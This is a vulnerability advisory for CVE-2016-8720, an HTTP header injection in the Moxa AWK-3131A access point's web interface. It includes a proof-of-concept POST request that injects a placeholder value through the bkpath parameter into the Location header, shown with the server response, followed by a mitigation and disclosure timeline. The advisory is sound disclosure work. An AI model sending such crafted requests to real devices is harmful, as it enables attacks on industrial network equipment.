CVE-2016-8720
An exploitable HTTP Header Injection vulnerability exists in the Web Application functionality of the Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted HTTP request can inject a payload in the bkpath parameter which will be copied in to Location header of the HTTP response.
Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1
http://www.moxa.com/product/AWK-3131A.htm
3.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N
An exploitable HTTP Header Injection vulnerability exists in the Web Application functionality of Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. A specially crafted HTTP request can inject a payload in the bkpath parameter which will be copied in to Location header of the HTTP response. This vulnerability can be exploited in order to execute a variety of other attacks.
Request
POST /forms/iw_webSetParameters HTTP/1.1
Host:
iw_IWtime_timeZone=22&iw_IWtime_dstOnMonth=Oct.&iw_IWtime_dstOnWeekIndex=1st&iw_IWtime_dstOnWeekDay=Sun.&iw_IWtime_dstOnTrigHour=00&iw_IWtime_dstOnTrigMin=00&iw_IWtime_dstOffMonth=Oct.&iw_IWtime_dstOffWeekIndex=Last&iw_IWtime_dstOffWeekDay=Sun.&iw_IWtime_dstOffTrigHour=00&iw_IWtime_dstOffTrigMin=00&iw_IWtime_dstOffsetTime=%2B01%3A00&iw_IWtime_firstTimeSrv=time.nist.gov&iw_IWtime_secondTimeSrv=&iw_IWtime_queryPeriod=600&Submit=Submit&bkpath=EVIL_INJECTION&iw_IWtime_dstEnable=DISABLE
Response
HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Mon Oct 31 17:33:45 2016
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Content-Type: text/html
Location: http://
<html><head></head><body>
..This document has moved to a new <a href="http://<device IP>/EVIL_INJECTION">location</a>.
..Please update your documents to reflect the new location.
..</body></html>
To significantly mitigate risk of exploitation, disable the web application before the device is deployed.
2016-11-14 - Vendor Disclosure
2017-04-10 - Public Release
Discovered by Patrick DeSantis of Cisco Talos.